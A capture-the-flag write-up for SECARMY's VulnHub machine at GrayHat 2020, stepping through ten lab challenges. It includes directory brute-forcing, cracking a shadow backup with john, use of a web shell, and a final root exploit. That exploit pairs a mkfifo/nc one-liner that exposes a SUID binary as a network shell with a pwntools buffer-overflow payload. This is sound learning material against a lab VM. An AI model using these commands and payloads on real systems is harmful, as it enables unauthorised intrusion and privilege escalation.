SECARMY’s CTF @ GrayHat 2020 — Write-up

Secarmy’s CTF banner at GrayHat 2020

Summary

GrayHat 2020 has ended and a lot of great content was presented in the conference of this year. During these days, many villages did their own contests and with SECARMY was no different.

Setup

In order to get started, we should download a VM from VulnHub designed specifically for this CTF. You can find it at https://is.gd/LfvQPt.

Challenges

This CTF was composed of 10 challenges which should be completed in order from the first until root. Following is a quick description and solution for each one of them.

#1: Uno

After a initial scanning, we see that the machine is running a web server. This is the page we are presented to:

A welcome page asking us to search for a hidden directory.
A welcome page asking us to search for a hidden directory.
dirsearch -u http://192.168.0.166 -E -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
A page in a hidden directory with the credential for the first user written in white.
A page in a hidden directory with the credential for the first user written in white.

#2: Dos

Use the credential to login as user dos.

A readme file containing instructions to proceed to second challenge.
A readme file containing instructions to proceed to second challenge.
Find among a bunch of files until find a base64 encoded string.
Find among a bunch of files until find a base64 encoded string.

#3: Tres

While logged as user dos we can also see a file called 1337.txt with the following message:

Accessing the netcat service to get the credential for user “tres”.
Accessing the netcat service to get the credential for user “tres”.

#4: Cuatro

The instructions cited previously make it clear that the next challenge is about binary analysis. This, however, does not involve complex reverse engineering.

Instructions for the fourth challenge.
Instructions for the fourth challenge.
upx -d secarmy-village 
strings secarmy-village
Credential for the fourth user obtained from strings.
Credential for the fourth user obtained from strings.

#5: Cinco

The instructions point us to http://192.168.0.166/justanothergallery.

A web page containing a QR code image.
A web page containing a QR code image.
for i in {0..68}; do curl -s http://192.168.0.166/justanothergallery/qr/image-$i.png | zbarimg -q -

#6: Seis

To find Cinco’s secret place we can run the following command:

find / -user cinco -type d 2>/dev/null
chmod +r shadow.bak
john --wordlist=/usr/share/wordlist/rockyou.txt shadow.bak
The cracked hash.
The cracked hash.

#7: Siete

In this challenge, we are asked to go to http://192.168.0.166/shellcmsdashboard.

A login page.
A login page.
Listing files using the web shell.
Listing files using the web shell.
The credential for the seventh user.
The credential for the seventh user.

# Ocho

When logged in as siete, we can see some files related to the next challenge. There is a password protected zip file, a Go file that is supposed to help but it is full of syntax errors, a hint and a pair of message and key files.

The list of files for the challenge.
The list of files for the challenge.
package mainimport "fmt"func main() {
chars := []byte{11, 29, 27, 25, 10, 21, 1, 0, 23, 10, 17, 12, 13, 8}

fmt.Printf("Representation: %#v\n", chars)
fmt.Printf("Hex: %x\n", chars)
fmt.Printf("Int: %d\n", chars)
fmt.Printf("Bin: %b\n", chars)
}
$go run mighthelp.goRepresentation: []byte{0xb, 0x1d, 0x1b, 0x19, 0xa, 0x15, 0x1, 0x0, 0x17, 0xa, 0x11, 0xc, 0xd, 0x8}
Hex: 0b1d1b190a150100170a110c0d08
Int: [11 29 27 25 10 21 1 0 23 10 17 12 13 8]
Bin: [1011 11101 11011 11001 1010 10101 1 0 10111 1010 10001 1100 1101 1000]
>>> "".join([chr(x ^ 120) for x in bytearray([11, 29, 27, 25, 10, 21, 1, 0, 23, 10, 17, 12, 13, 8])])
'secarmyxoritup'

#9: Nueve

For this challenge, we are given a PCAP file called keyboard.pcapng. Opening this file with Wireshark, we can find some HTTP requests.

Network packets analysis with Wireshark.
Network packets analysis with Wireshark.
A message disclosing a string of interest inside file none.txt.
A message disclosing a string of interest inside file none.txt.

#10: Root

We finally got to the final stage! In this last challenge, we are given a SUID binary that we should exploit in order to get a root shell. The program reads the user input and does nothing in case of a failed attempt.

Listing and execution of the exploitable program.
Listing and execution of the exploitable program.
undefined8 main(void)
{
char local_28 [24];
long local_10;
local_10 = 0;
setbuf(stdout,(char *)0x0);
setbuf(stdin,(char *)0x0);
setbuf(stderr,(char *)0x0);
puts("hello pwner ");
puts("pwnme if u can ;) ");
gets(local_28);
if (local_10 == 0xcafebabe) {
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh",(char **)0x0);
}
return 0;
}
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|./orangutan 2>&1|nc -lvp 2222 >/tmp/f
from pwn import *offset = b"A" * 24
secret= b"\xbe\xba\xfe\xca"
payload = offset + secretio = remote('192.168.0.166', 2222)
print(io.recvline())
print(io.recvline())
io.sendline(payload)
io.interactive()
Result of executing the exploit.
Result of executing the exploit.

Offensive security practitioner for fun and open source enthusiast. Sometimes I research or break something.